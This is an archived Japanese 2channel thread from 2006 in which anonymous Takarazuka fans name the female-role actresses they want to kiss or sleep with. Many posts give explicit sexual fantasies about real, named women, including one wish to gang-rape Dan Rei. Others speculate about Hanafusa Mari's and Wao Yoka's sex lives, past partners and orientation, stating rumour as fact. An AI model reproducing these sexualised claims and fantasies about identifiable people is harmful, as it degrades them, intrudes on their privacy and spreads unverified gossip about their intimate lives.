2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

〜宝塚・娘役でキスしたいのは誰?(2人目)〜

1 :煩悩:2006/09/02(土) 13:27:15 ID:v151bQ5A
娘役限定、キス(ラブシーン)したいのは誰?その2。
つまらん理屈で語るな。本能で愛を語れ。ただし変態プレイ願望不可。

2 :名無しさん@花束いっぱい。:2006/09/02(土) 18:03:50 ID:GFhQ61wb
糞スレ立てんな>1

3 :名無しさん@花束いっぱい。:2006/09/02(土) 22:14:11 ID:6jv97B/h
良スレだ。うんうん。
コレがないと2ちゃんに来た気がせん。

お花だ末子だ!シナだかなみだ!
・・・・つうか、前スレから気になっていたが、
何故まーちゃんが出てこないのだろう。痩せすぎだからか??
でもアリスの名前はあがってたしなぁ。
確かに自分も、ま〜には食指が動かんが・・・。

4 :名無しさん@花束いっぱい。:2006/09/02(土) 23:19:24 ID:/AM5EPS0
檀れいを三人で犯したい
男は駄目

5 :名無しさん@花束いっぱい。:2006/09/03(日) 02:39:37 ID:swrd1iW8
4Pってことか?

6 :名無しさん@花束いっぱい。:2006/09/03(日) 04:10:18 ID:VGNkDB6j
はい4Pでつ

7 :名無しさん@花束いっぱい。:2006/09/03(日) 19:35:45 ID:KAhQERIv
黒タイツ、黒のピンヒール姿のあすかに痛め付けられたい。
ああっ、女王様!

8 :名無しさん@花束いっぱい。:2006/09/04(月) 02:01:46 ID:vVUj39/u
↑のカキコ見て、前スレでは清らかオハナがモテモテだったが、
小悪魔オハナに踏みつけられるのもイイカナと思った。

9 :名無しさん@花束いっぱい。:2006/09/04(月) 03:43:39 ID:jMGcN9lm
退団してしまいまったが、ふーか壇、みはるちんや風花のゆうこりんもいいな

10 :名無しさん@花束いっぱい。:2006/09/04(月) 11:27:33 ID:YhJzem02
お花はやっぱアノ声と無駄にボンキュッしてないスレンダ-ぶりでキヨラカ感が一番強い。
小さな顔の顎を掴んでキスしたいんだよ。

11 :名無しさん@花束いっぱい。:2006/09/04(月) 12:39:24 ID:ECWpnOA2
それを大川貴子はしてるんだよ

12 :名無しさん@花束いっぱい。:2006/09/04(月) 13:19:26 ID:TB7Exhu7
ハナタンの小さい唇こじあけて舌に吸い付きたいよ。
貴子マジ裏山。

13 :名無しさん@花束いっぱい。:2006/09/04(月) 14:07:20 ID:1uYcC6bq
花總しか愛せない。

14 :名無しさん@花束いっぱい。:2006/09/04(月) 14:39:04 ID:vVUj39/u
人生は長いぞ。手に入らない花ばかり見てないで、もっと浮気心持って妄想しろぃ。
宝塚の半分は娘役なんだからさー。オハナは心のマドンナとしてしまっときな。

15 :名無しさん@花束いっぱい。:2006/09/04(月) 17:51:41 ID:n8ZBKiXe
>>14
確かに人生長いからハナ以外にもキスしたい上等な娘役を探す努力をしてるさ
だけどもハナのように完璧自分好みの娘役は見つからん
これほど特別な存在になろうとはな
ハナを後ろからぎゅっと抱きしめてキスしたい
この気持ちはどうしようもない

16 :名無しさん@花束いっぱい。:2006/09/04(月) 17:57:06 ID:2JBVHM22
ハナヲタってキモ杉
同じこと何度も書き込み繰り返して・・・こわっ
まともな恋愛もできなさそう

17 :名無しさん@花束いっぱい。:2006/09/04(月) 18:17:32 ID:vVUj39/u
このスレでキモイ言われたら、言われた方が気の毒だ。オタクは普通気持悪いもんだよ?
そして純情一途なのがオタクなのさ。んで自分に素直でもある。
オハナにはオタクを狂わせる何かがあったとは思う。
このまま隠居したら普通の女(ビアンだけど)に戻っちゃうだろうが。

18 :名無しさん@花束いっぱい。:2006/09/04(月) 20:58:29 ID:8Z4P1/nM
スレチだが、昔岡村孝子というシンガーソングライターがいて(今でも活動しているが)妙に宝塚の娘役チックなところが好きだった。
永遠の乙女のような感じが。
何度も何度もコンサート通ったもんだ。

19 :名無しさん@花束いっぱい。:2006/09/04(月) 21:19:09 ID:cgU3GGdf
16もヒトの妄想にケチつけとらんで趣旨に沿ってカキコしたら?
私もおハナは永遠のアコガレだな。一度でいいからお願いしたい。

20 :名無しさん@花束いっぱい。:2006/09/04(月) 21:30:26 ID:mECQFodC
私もって・・・
何度も同じことばーっかり書いてるくせに
前スレからずっと繰り返しハナハナハナ!
ハナ以外の人書いてもすぐこうなってるんだよ!
もうおなじような書き込み読むのも秋田から読んでないけど

21 :名無しさん@花束いっぱい。:2006/09/05(火) 08:41:17 ID:Fn5S3X86
読んでないのにオハナの話題にピリピリするのかい。
ここは素直に本能煩悩欲望で書き込むスレだと1も言ってる。
理屈はいらんのよ。

22 :名無しさん@花束いっぱい。:2006/09/05(火) 19:38:13 ID:ayGSnWat
20番も他のカキコが気にサワルなら読まないでジブンの煩悩を吐き
タマエよ。ハナ、やっぱり抱きたいナンバーワンだ、ジブンには。

23 :名無しさん@花束いっぱい。:2006/09/06(水) 08:46:18 ID:Ew2+JcPg
確かにジェンヌの半分は娘役なんだよねー。
「おとめ」見て抱きたい娘探しているけど、やはり華奢な娘がいいなー。
自分としては、うめちゃんだなー! 筋肉がついた足とか触ってみたい。


24 :名無しさん@花束いっぱい。:2006/09/06(水) 08:52:24 ID:kjf8/NhQ
花總まりと和央ようかが10年近く男女な関係な件につあて

25 :名無しさん@花束いっぱい。:2006/09/06(水) 09:29:05 ID:od201v7e
男役和央については他で語りたまえ。ここは娘役限定スレ。
それと忠告しておくが、タカハナは男女の関係ではなく、女女の関係だぜ。

26 :名無しさん@花束いっぱい。:2006/09/06(水) 11:28:54 ID:vAx5r7rP
女同士って、どんな風に愛し合うの〜?
信じられない・・

27 :名無しさん@花束いっぱい。:2006/09/06(水) 11:57:16 ID:OQ+EqibB
触ってなめて、手や道具を入れるんだよ。


28 :名無しさん@花束いっぱい。:2006/09/06(水) 12:11:54 ID:od201v7e
マジレスさせてもらうが、舌と手(指)だよ。
道具はビアンでもそーゆー趣味のカップルしか使わない。
男向けのAVに出てくるビアンのプレイは男が喜ぶように出来ているので参考にしないように。

29 :名無しさん@花束いっぱい。:2006/09/06(水) 12:25:35 ID:kjf8/NhQ
タカハナはノーマルだから安心しな
二人とも合コンやってたから男好き

30 :名無しさん@花束いっぱい。:2006/09/06(水) 12:58:27 ID:hMt+aq3C

<ID:kjf8/NhQ>は多重人格粘着真性麻子ファン=精神異常者です。

基地外なのでくれぐれもレスしないように&釣られないように。

詳しくはここの7〜11参照。
http://hobby8.2ch.net/test/read.cgi/siki/1155964993/l50

★特技:一人二役、または三役、成りすまし、自演

31 :名無しさん@花束いっぱい。:2006/09/06(水) 13:05:34 ID:kjf8/NhQ
マジ話だよ

タカラジェンヌ 合コン
で検索してみ
ブログ出てくるから

32 :名無しさん@花束いっぱい。:2006/09/06(水) 13:18:07 ID:1L8ZlHLE
お花様はこのままずっと雲隠れ状態が続くのか。
高貴さに加え更に稀少価値感が高まるな。
キスしてみたいよなー

33 :名無しさん@花束いっぱい。:2006/09/06(水) 13:38:27 ID:od201v7e
このスレにまできて必死に合コン話されてもアオリにもならねーよ。

34 :名無しさん@花束いっぱい。:2006/09/09(土) 01:47:58 ID:Osk6lpQt
純花まりい

35 :名無しさん@花束いっぱい。:2006/09/09(土) 09:42:37 ID:xWK5K32L
花總まり

36 :名無しさん@花束いっぱい。:2006/09/09(土) 10:02:18 ID:hZetJgD1
まりはモテルね。
お花は何しているんだろう。8月末にタカコとシザーハンズ観劇していたんだよな・・・
将来、タカコ以外に抱かれることもあるんだろか。それはそれで苛立つが。

37 :名無しさん@花束いっぱい。:2006/09/10(日) 00:33:30 ID:rNOvHPeT
ヅカの娘役は独特のキヨラカさを持ってるんだよな。
それが退団すると突如普通の女にもどっちまう。
エミクラなんぞ、外見の幼女っぽさに萌ていたのだが、
退団したとたんに歳相応になっちったし、キヨラカさなんぞなくなった。
そう考えるとオハナはもう女優として出てこないで欲しいんだよな。
少数意見かもしんないが、オハナは永遠のキヨラカでいて欲しいし、
キヨラカなイメージは崩して欲しくない。
オトコ無しのままタカコに組み敷かれていて欲しい。

38 :名無しさん@花束いっぱい。:2006/09/10(日) 08:37:37 ID:tbNKm+f9
姿晴香さま。
あのお年で永遠に幸薄く可憐なのは奇跡。

39 :名無しさん@花束いっぱい。:2006/09/10(日) 09:10:33 ID:Ppjv4x3f
おいくつでいらっさるのかしら?

40 :名無しさん@花束いっぱい。:2006/09/10(日) 14:56:12 ID:+w+haw43
姿晴香さんは高卒で1973年初舞台だから53歳っすね。
ホント幸せな役とか笑ってるのか見たこと無いな。
素でもモノスゴイ無口な人らしいし。

41 :名無しさん@花束いっぱい。:2006/09/11(月) 01:16:29 ID:9qkh6DjB
『晴れた日に〜』でメリンダ(ハナ)とエドワード(タカコ)が初めてモニョした後
エドワードに寄り掛かるメリンダの満足そうな表情がエロくてイイ。

42 :名無しさん@花束いっぱい。:2006/09/11(月) 09:28:02 ID:+w8beW0y
OGだけど、じゅんべさんは美人で色気もあって、誘惑されたいと
思った。

43 :名無しさん@花束いっぱい。:2006/09/11(月) 10:07:28 ID:SANir+Ij
>41
その頃のおハナはまだ22か23歳なんだよな。
無理した痛々しい色気に見えたよ。いまの方がアク抜きされて自然にキヨラカ。
今も昔もしてみたいに変わりはないけどサ。

姿晴香をググッてしまった。
確かに美人だが、娘役時代の写真を見たかったな。

44 :名無しさん@花束いっぱい。:2006/09/11(月) 10:11:07 ID:Hg3rO3rJ
あどけない顔をしている時の小顔の花總まりがいい
オレの隣でふにゃふにゃしてくれたら最高だけどな

45 :名無しさん@花束いっぱい。:2006/09/11(月) 11:45:52 ID:ZnMErJIQ
永遠に幸薄く可憐な姿晴香!!!w
ほんと薄幸の美人娘役だったなぁ。
もう53歳なのかー。


46 :名無しさん@花束いっぱい。:2006/09/11(月) 14:00:11 ID:FUC+MCz3
チョオォオ姿晴香ww
帝国物語の怪演忘れられん。それでも清純無垢。

47 :名無しさん@花束いっぱい。:2006/09/11(月) 15:18:31 ID:SANir+Ij
姿晴香か花總まりか・・・ってか。

ところで姿晴香ファソの皆さんはいったいおいくつで?

48 :名無しさん@花束いっぱい。:2006/09/11(月) 15:42:34 ID:A5/UK2f5
私は34歳w
別にファンってわけじゃないけど(自分子供だったし)姿晴香懐かしいね
清楚で可憐な薄幸美人と言えば私は湖城れいかだけど。


49 :名無しさん@花束いっぱい。:2006/09/11(月) 16:40:52 ID:FUC+MCz3
姿晴香は現役当時知らないしw。
サスペンスの犯人とか映画だな。
帝国→帝都物語ね

50 :名無しさん@花束いっぱい。:2006/09/11(月) 22:33:52 ID:LtKb5Xt0
湖城れいかもおとなしめでトロ〜っとしてていい感じだったけど
結構大口開けたりして楽しそうな笑顔のイメージがあるんだよね。
(そこも好きだったが)
姿晴香さんはあくまでも控えめな微笑みっつうか、幸薄そうな
儚げな微笑みっつうかw。
どうやって男役演じてたんだろうな。7〜8年ぐらい?

51 :名無しさん@花束いっぱい。:2006/09/13(水) 00:37:52 ID:YEo08m1u
おハナ・・・姿が見れるのは嬉しいが、なんでタカコのコンサートなんだ・・・
結局まだまだ一緒とゆーことかい・・・

52 :名無しさん@花束いっぱい。:2006/09/13(水) 03:12:55 ID:nW/yXdWJ
でもハナがまた表舞台に出てくれるのはめでたい。
閉じ込められなくてよかったと思うぞ。

53 :名無しさん@花束いっぱい。:2006/09/14(木) 00:37:05 ID:W6CgyYme
その点ではタカコはハナの舞台人としての魅力を理解してるのかな。
ハナを独占して抱きたいだけなら、
自分のコンサートに出したりはしないだろうからな。
普通は退団から半年たてばただの女になってしまうが、
タカコのそばにいると思えば、ヘンに世間ズレせずに、
浮世離れした清純さは保てるんじゃないかな。
おかげでこっちもキヨラカお花を抱く妄想を続けられるよ。
タカコに礼を言うべきか。

54 :名無しさん@花束いっぱい。:2006/09/15(金) 00:36:16 ID:9zoFN8II
おハナタン・・・無垢なまま再登場しておくれ。
あの可愛い声をまた聞かせておくれ〜。

55 :名無しさん@花束いっぱい。:2006/09/15(金) 02:08:37 ID:/AK7+Epa
http://www.im.tv/vlog/Personal.asp?Memid=301744&FID=439698
↑やっぱこのおハナタンが最高っす!

56 :名無しさん@花束いっぱい。:2006/09/15(金) 21:49:09 ID:rY015pFZ
>55
カルメン良かったよね!! ずんこが羨ましく思ったよ。
ずんこの髪を触りまくったりしていたよね?

57 :名無しさん@花束いっぱい。:2006/09/15(金) 23:58:41 ID:o+H+2KWa
檀とねっとり

58 :名無しさん@花束いっぱい。:2006/09/16(土) 01:02:45 ID:r+W7fgXC
おハナのを・・・・・舐めたい・・・・。舌だけでイカセたい。
・・・言ってしまった・・・・。

59 :名無しさん@花束いっぱい。:2006/09/18(月) 01:43:39 ID:3AcAbECT
んじゃ、ジブンは指でイカセてやるよ。

60 :名無しさん@花束いっぱい。:2006/09/18(月) 02:00:53 ID:WYT+mYfK
ハナフサか・・・今なにしてるんだ?
トゥーランドット姫のハナフサ様に冷たくにらまれたい
ナウオンの舌足らずな早口のハナフサは
可愛らしすぎるからヲイヲイシッカリ汁と頭小突いてやりたい
やっぱハナフサ最高だな キスしてーぞ!


61 :名無しさん@花束いっぱい。:2006/09/18(月) 23:05:00 ID:5W9U0P4j
ハナフサ様は毎日タカコさんに愛されて暇無しですタイ。
今度のコンサートもタカハナコンサートらしいよ。
2人の他はただのバックダンサー(全員女)だけだと。

62 :sage:2006/09/19(火) 17:32:08 ID:5zZOyaqZ
ここ書き込みしてる人、男性も混ざってる?

63 :名無しさん@花束いっぱい。:2006/09/19(火) 17:33:41 ID:ui57CpVY
花總と貴子は体の関係なしだろ?

64 :名無しさん@花束いっぱい。:2006/09/19(火) 18:09:53 ID:31UOTX+v
プラトニックなほうが説明つかないね。

65 :名無しさん@花束いっぱい。:2006/09/20(水) 22:32:17 ID:ZlkUCDwk
五峰姐さんに濃ゆ〜いディープキスをしてもらいたい。喘いでる表情を子悪魔っぽく見つめて欲しい。

66 :名無しさん@花束いっぱい。:2006/09/22(金) 00:42:51 ID:rbmv8j6E
五峰姐さんに組み敷かれているお花を見たい。
あ?スレちだった?

67 :名無しさん@花束いっぱい。:2006/09/22(金) 01:00:21 ID:wIx5abeY
タカハナがマジに恋人同士であるとわかってきて、
なんか嬉しく思ってしまうんだな。
在団中は妄想かもしれないと思って、心のどこかで否定もしてた。
自分はビアンなんでハナが男のモノにならずにすんでいるのが嬉しい。
ま、タカコがチト羨ましいけど。
ファンサイトや別館じゃ、ビアンだからタカハナ応援してるなんて
なかなか書き込めないからなぁ。
ビアンのネコちゃんて、本当に本能で甘えんぼが多いから、
ハナがニャンニャン鳴いているのを想像してニマニマしちまうわー。

68 :名無しさん@花束いっぱい。:2006/09/22(金) 01:44:45 ID:yERtOCAz
ttp://www.im.tv/vlog/Personal.asp?Memid=397004&FID=624623
この動画でタカコに首責められてハナが思わず声を漏らしてる。
これ見てニマニマしてたとこー。
タカコウラヤマシスギ!


69 :名無しさん@花束いっぱい。:2006/09/22(金) 01:51:44 ID:4hJppMYL
音姫すなおちゃん♪

70 :名無しさん@花束いっぱい。:2006/09/22(金) 05:45:19 ID:ImfodGgL
私はふっくらムチムチしたw可愛い娘役さんがいいな〜、カノチカちゃんとか。
我ながらおやじ…

71 :名無しさん@花束いっぱい。:2006/09/22(金) 17:57:48 ID:B2SfFVgl
>68

本当だ〜
声が聞こえちゃう・・・
聞いてはいけないものを聞いちゃったような!

72 :名無しさん@花束いっぱい。:2006/09/23(土) 23:57:40 ID:po88MoYV
ふわふわベッドにオハナを沈めたい。
イヤッとか言わせたい。

73 :名無しさん@花束いっぱい。:2006/09/24(日) 02:11:32 ID:MXdIvTTz
これって、放送分にもこの声は言ってたっけ?
聞き逃してたのか…自分。
花にこんなキスしてー

74 :名無しさん@花束いっぱい。:2006/09/24(日) 10:25:35 ID:VD2NZFWy
初めて見た、こんなん劇団出してたのか。
これ、元ネタって何?

つうか和央やった後、素で微かに笑ってる。
マジメニ仕事やれw
カノと同じ職場っていいな。和央羨まし杉

75 :名無しさん@花束いっぱい。:2006/09/25(月) 00:21:59 ID:k67QG520
香港公演のメイキングビデオ「Just Now!!」だよ

これ、ビデオで見るとあのシーンの声はお花じゃないような気が...?
タカコになりてーーーいちゃつきすぎだっつの

76 :名無しさん@花束いっぱい。:2006/09/26(火) 09:22:49 ID:42pRTnt2
タカハナまじで付き合ってるわけないよな?

77 :名無しさん@花束いっぱい。:2006/09/26(火) 10:11:21 ID:UAmqikkq
付き合うとかゆーレベルの話ではないっしょ。中学生じゃないんだからさー

78 :名無しさん@花束いっぱい。:2006/09/27(水) 20:14:27 ID:eer/64ZS
>75
あれは凄いビデオだよね。ファンが騒いでいるのみて馬鹿にしてたんだけど実際みたら本当にイチャついてた。
ズンハナお披露目だった筈なのに、あんな場面こんな場面、収録しちゃっていいのかねー

79 :名無しさん@花束いっぱい。:2006/09/27(水) 23:21:01 ID:J3YH+Gdj
和央ようかザ・ラストデイDVDのサヨナラショー
「ミレニアム・チャレンジャー!」でのお花様を見て思ったが
お花様は絶対に男相手はバー○ンだと思う。
あの清純無垢なオーラは、男を知った体からは出せねえよ、絶対。
ハァハァ貴子羨ましすぎ。

80 :名無しさん@花束いっぱい。:2006/09/27(水) 23:25:13 ID:oefVFQ4R
女相手は貴子で何人目?

81 :名無しさん@花束いっぱい。:2006/09/28(木) 02:10:32 ID:30l3SfyW
初恋は久世、初体験は高嶺、結婚は和央。

82 :名無しさん@花束いっぱい。:2006/09/28(木) 10:41:47 ID:p2HOQrS6


83 :名無しさん@花束いっぱい。:2006/09/28(木) 20:04:26 ID:mx67GJiD
いや、初恋はたかこ、冒険したのは久世、初体験もたかこ、結婚も和央でしょ。
同棲はイチロ退団直後だったんだから、高嶺はありえない。
きっとチューもどんどん濃くなったんだろうなー。初体験以降は花からのキスのが多そう。
うらやましい。

84 :名無しさん@花束いっぱい。:2006/09/28(木) 20:38:49 ID:/JsLy17A
同棲(ストーカー避難)はゴーストからだよん。
仮面の〜から噂あったとしても高嶺さんには喰われてるね。

85 :名無しさん@花束いっぱい。:2006/09/28(木) 20:46:24 ID:CR2w0LY7
つ星組時代

86 :名無しさん@花束いっぱい。:2006/09/28(木) 20:58:57 ID:30l3SfyW
初恋は久世星佳だよ〜。音校時代の片想い。初舞台で世話係になったらしいけど。
星時代はありえなさそう。

87 :名無しさん@花束いっぱい。:2006/09/29(金) 00:39:45 ID:Z9no6oNB
初体験は高嶺ってw
ああって納得しちゃった。一路のときはまだ堅さがあるんだけど、高嶺になってから自分のすべてを預けちゃってる安定感が見えるんだよね。実際舞台のラブラブモードと言ったら‥ご馳走様でした( -人-)

88 :名無しさん@花束いっぱい。:2006/09/29(金) 01:23:09 ID:1vLpL67q
以外と、2戦で、食われてるかもしれんぞ!
兄さんにw

89 :名無しさん@花束いっぱい。:2006/09/29(金) 06:27:04 ID:7D8jz2lJ
高嶺のユキちゃん今はノンケなんだお

90 :名無しさん@花束いっぱい。:2006/09/29(金) 09:34:30 ID:/NURC6uY
ノンケもおハナのキヨラカさに汚したいと思うのさー
あ〜、服の上からでいいからキュウって力一杯抱き締めたい。
イヤイヤってされてみたいおー。

91 :名無しさん@花束いっぱい:2006/09/29(金) 23:40:16 ID:Dy/fUOUs
>88さん 
意外と、二戦で食われてるかもしれんぞ!
タカコさんに! 私もそう思う。兄妹を超えていた。


92 :名無しさん@花束いっぱい。:2006/09/30(土) 01:54:52 ID:LoqW3Wqc
絡み付くようなジプシーダンスはその賜物だな…。
組移動日の同期歓迎会に紛れ込んだ(一人居残った)時点で食ってるだろ>たかこ
はな20歳位? 初ちゅーかな? どんな顔したんだーーーー!!

93 :名無しさん@花束いっぱい。:2006/09/30(土) 02:14:46 ID:Xsn/dp6l
タカコもまだ経験不足でヘタクソだったかもよ。

94 :名無しさん@花束いっぱい。:2006/09/30(土) 02:39:39 ID:+pXMyrwj
レズビァンもセックステクニック気にするのぉ?

95 :名無しさん@花束いっぱい。:2006/09/30(土) 10:25:45 ID:CX5wtths
ビアンは舌と指が命です。

96 :名無しさん@花束いっぱい。:2006/09/30(土) 14:36:42 ID:Xsn/dp6l
バリタチならカノを何度もイカせたいのは当たり前だ〜。
カノがバリネコなら尚更。タカコも頑張ったに違いない。

97 :名無しさん@花束いっぱい。:2006/09/30(土) 15:07:26 ID:iByiN0no
んだんだ
たかこもバリタチなのかな
自分もバリタチだ

98 :名無しさん@花束いっぱい。:2006/10/01(日) 01:35:24 ID:LN4OzUGp
タカコ自身はリバっぽいんだけど、相手がバリネコちゃんのハナとなると、
がぜんバリバリのバリタチでアンアン鳴かせたがると思うよん〜。
ハナはひたすら悶え苦しむのさ〜。
んで果てるまで絶対に許してやらない。(ハァ・・・イイナ〜タカコ)

99 :名無しさん@花束いっぱい。:2006/10/01(日) 16:17:43 ID:S54fkWtE
タカハナのプレイDVDが欲しい。今までの稽古場映像をつなげたら似たものができるかもしれんが・・。

100 :名無しさん@花束いっぱい。:2006/10/01(日) 18:32:40 ID:bgZsiFqY
ジブンは裏DVDがみたいなー。
てゆーか、タカコはいらんので攻めてる後姿のみでOKよ。
あとはひたすらハナのアップ連続でよろしゅう。48手見せておくれ。

101 :名無しさん@花束いっぱい。:2006/10/02(月) 13:23:37 ID:SJhZTSSg
ハッチ組長も、花ちゃん狙っていたの??

102 :名無しさん@花束いっぱい。:2006/10/02(月) 13:30:18 ID:UZ8itL2G
タカハナは違うよ。それを証明するのが爪。
今まで、タカコが爪をのばさないのは真性だから・・・って散々言われてきたけど、ここ最近の彼女、白爪伸ばしてネイルアートしてる。(9月のイベントで立証済み)
・・・ってことは!
今まで爪を伸ばさなかったのは、ビアンだから、SEXするときに痛いからってことではない。
ただたんに、男役が終了したからです。

103 :名無しさん@花束いっぱい。:2006/10/02(月) 14:49:59 ID:LXKmCvoK
>102
スレ違いに一応マジレスすると
イベント時、爪は心持ち白い部分あったがネイルアートはしてなかったよ。
ナニゲに薄く色でマニキュアしてたけど。
それよか、スレタイからなんでこんなに逸脱してるわけ?
タカちゃんは元男役だしこのスレに関係ないじゃん。
このスレはキスしたいと思う娘役を書くスレなんでしょ?
花様の顎をガシっと掴んで薄くて小さい唇にマジ食いついてみたい。

104 :名無しさん@花束いっぱい。:2006/10/02(月) 14:54:56 ID:O/hLhbrX
私はバリネコだから、まゆみさんがいい

105 :名無しさん@花束いっぱい。:2006/10/02(月) 15:28:45 ID:HyyN4PWu
ネイルアートなんぞしていなかったし、伸びているといっても1〜2mmだったよ。
フカヅメたかこにしては伸ばしてるには違いないけど。薄いパールだった。

106 :名無しさん@花束いっぱい。:2006/10/02(月) 21:00:24 ID:ktg7scDw
私はビアンではないけれど、寝ている間に耳を掻く癖があるので、危険がないように人指し指と親指の爪は常に深爪にしている。
他の指の爪も、意味も無く伸ばすのは不潔っぽいので、同じく短くしている。
爪だけで判断されてはたまらない。
爪の短い人は単に清潔なだけなのでは?

107 :名無しさん@花束いっぱい。:2006/10/02(月) 21:15:19 ID:lLK61tVf
↑こんなスレ除きに来ておいてよくいうよ〜。
ビアンの願望バリバリじゃん

108 :名無しさん@花束いっぱい。:2006/10/02(月) 21:35:42 ID:RD7JUWqx
↑こらこら煽るんでない。

微妙にスレチだけど、かの春日野御大は舞台上のキスシーンで本当にキスしていたことがあるらしいね。
相手役だった娘役(どなかは忘れた)が何かのインタビューで語っていた。「まだ役者になりきれてない私に本気の芝居をさせたかったのでしょう」みたいな。
今なら祭りだろうか。

109 :名無しさん@花束いっぱい。:2006/10/02(月) 21:42:20 ID:juoyHfCK
タカハナは今日も一緒。
ディズニーに行ってたらしいよ。
マジで仲いいね〜

110 :名無しさん@花束いっぱい。:2006/10/02(月) 21:44:36 ID:gmdcctX6
>104たん、ジブンもバリネコです〜。
トモチンやアヒみたな大きい人が好きなんだけど、
2人ともビアンの匂いは全然しないから残念〜。

このスレ読んだあと、カノの手をあらためてじっくり見ちゃった。
カノはライダーなんでたかちゃんよりゴツゴツ手なんだけど、
爪は白いとこが2ミリくらいある。
でも指のラインからはハミ出てはいないから、
Hしてても違和感全然ないし、ヘヘヘだよん。
途中で花ちゃんもこんな感じで抱かれてるのかな〜とか
考えちゃって、ダメダメとか思いながらしちゃった。

111 :名無しさん@花束いっぱい。:2006/10/02(月) 22:02:20 ID:HyyN4PWu
ハイハイ、バリネコちゃん。
ここは抱かれたいんじゃなくて、抱きたいスレなんですよ。
いい子でカノに抱かれてニャンニャンしていなさい。

112 :名無しさん@花束いっぱい。:2006/10/02(月) 22:57:56 ID:UZ8itL2G
>>110アヒはビアンだよ

113 :名無しさん@花束いっぱい。:2006/10/03(火) 00:02:07 ID:DBDfO+El
抱きたいスレなのか!?

114 :名無しさん@花束いっぱい。:2006/10/03(火) 00:19:26 ID:dp56zrBn
キスして(抱きたい)娘役!なんだよ。
別にビアンの必要なし、爪の短い長いも関係ない。
まして男役だったタカコや男役のあひは関係なし。

115 :名無しさん@花束いっぱい。:2006/10/03(火) 13:12:56 ID:CGZQOTe3
変わった嗜好かもしれんが
自分は男役相手だと「抱きたい」(襲いたい)し
娘役相手だと、襲われたい。

116 :名無しさん@花束いっぱい。:2006/10/03(火) 13:19:51 ID:DBDfO+El
んなこたあない。
よくわかる、私もそう。舞台の上での性役割を覆したくなるからかも。

117 :名無しさん@花束いっぱい。:2006/10/03(火) 13:50:56 ID:O9cPWIaV
292:名無しさん@花束いっぱい。 :2006/10/02(月) 08:43:47 ID:UZ8itL2G
安蘭けいのシワシワケツの穴舐めたい

118 :名無しさん@花束いっぱい。:2006/10/03(火) 15:40:38 ID:NCBlMp+P
ハナにギューって抱きつかれながら、「あのね、今日ね」
とかって言われたい。

119 :名無しさん@花束いっぱい。:2006/10/03(火) 17:41:41 ID:o4xi5XzB
みなみちゃんカワイイ

120 :名無しさん@花束いっぱい。:2006/10/03(火) 18:44:23 ID:cR0D7QZb
可愛い顔の娘役なら、誰でもいいから、抱きしめてみたい!!



121 :名無しさん@花束いっぱい。:2006/10/03(火) 20:28:30 ID:Le8kWAkN
>118
想像しただけでハナヂ。

122 :名無しさん@花束いっぱい。:2006/10/04(水) 00:43:48 ID:TK2H0L9N
なら、「お願い…」と言われたいぞ!

123 :名無しさん@花束いっぱい。:2006/10/04(水) 20:26:15 ID:nTJ+tLVB
とうこアイーダの胸・尻・足その他全身を
わたるに負けないくらい撫で回したい。
テクニックではラダメスわたるに負けません。

124 :名無しさん@花束いっぱい。:2006/10/04(水) 23:32:42 ID:+k68LgMr
スレち。トウコが娘役に転向してから語れ。

125 :名無しさん@花束いっぱい。:2006/10/05(木) 00:27:02 ID:jjBvU9S1
アイーダはとうこの限定娘役

126 :名無しさん@花束いっぱい。:2006/10/05(木) 00:47:32 ID:AEuYkfVq
トウコって何か分からんがソソルんだよなぁ・・・w何人の女に抱かれてきたのだろうか

127 :名無しさん@花束いっぱい。:2006/10/05(木) 02:17:47 ID:7TuqyVaT
違うトコで萌えてくれよ。
娘役じゃないんだからさ。

128 :名無しさん@花束いっぱい。:2006/10/05(木) 09:59:57 ID:lfNrFyqG
そうよ!!!
エチオピア人の話なんかしないでよ!!!

129 :名無しさん@花束いっぱい。:2006/10/05(木) 13:16:32 ID:jjBvU9S1
劇団の認識では、生徒一人一人について「この子は男役あの子は娘(女)役」という分類は明確には定めていないはず。
この事は90周年誌にも明記してある。
つまり男役か娘役かは生徒に属するのではなくて役に属するもの。そう考えると、アイーダをやってた時のとうこは立派な娘役。


130 :名無しさん@花束いっぱい。:2006/10/05(木) 13:57:37 ID:DLQOmElz
どっちにしろトウコは通常男役なんだからさ。
漏れは、となみ いちか とキスしたいな。

131 :名無しさん@花束いっぱい。::2006/10/05(木) 19:06:35 ID:6lDJ5ZDC
>129
そりゃあ最初にはっきり男役女役区別してたら、あさこシシィのような
集客のためのウルトラC戦略はできねえもんな。
ご都合主義のあの劇団らしい言い訳だわさ。
でもファンの立場から見れば、あくまで男役は男役、娘役は娘役。
ぴっしり分かれている。

132 :名無しさん@花束いっぱい。:2006/10/05(木) 19:15:00 ID:u2IugyqU
男役が娘役に転向したら公式発表があるんだから、ファンの認識云々じゃなく、明確に分かれてると思うが…。

133 :名無しさん@花束いっぱい。:2006/10/05(木) 23:16:09 ID:jjBvU9S1
それは、敢えて観客の立場に立って、いわばファンに迎合してそのような表現をしてるだけ。
ファンあっての宝塚だからね。
ただ劇団の見解ではあくまで、はっきりとした区別はしていないというのが本当のところだと思う。


134 :名無しさん@花束いっぱい。:2006/10/06(金) 14:59:38 ID:SORbnXM/
結論:とうこの話はスレ違い

135 :煩悩:2006/10/06(金) 18:23:58 ID:9zR2oGZH
1です。どーも。
ここは「娘役限定」でよろしくです。
詳しく言えば「娘役専門のタカラジェンヌ限定」ってことです。
ついでに言えばOGもオッケーです。娘役ならお歳も問わず。

さぁ、皆、理性はいらんからチューしたい娘役や、チュー以上をしたい娘役を語っておくれ!

136 :名無しさん@花束いっぱい。:2006/10/06(金) 20:33:47 ID:bbomkdvX
ネズミイランドで(も?)やっぱり抱かれちゃったんだろうか、ハナ。
それともさ、今までマジきよらかさんだったハナをタカコがとうとう
食っちゃったとか…くーっ、辛抱たまらんっす!ハナ抱きたいよハナ。

137 :名無しさん@花束いっぱい。:2006/10/06(金) 21:26:52 ID:yhlpVztB
ホテルミラコスタの超たっけえスウィート(ベッド一台)に二泊だよ!?
完全にヤッてるよ.....。

ああ〜〜〜タカコいいなあああ。。。
激甘な目撃談読んでたらめちゃくちゃ抱きたくなった。

138 :名無しさん@花束いっぱい。:2006/10/06(金) 21:51:55 ID:h9HJUrGi
南口前のエレガンスでオハナと一泊したい


139 :名無しさん@花束いっぱい。:2006/10/06(金) 23:54:54 ID:vL52U4rg
タカコとはふかふかベッドでいつもしてんだろうから、
せんべい布団の上でやっちまいたいなー。
138は1泊するだけで清い仲で終わるんだね。

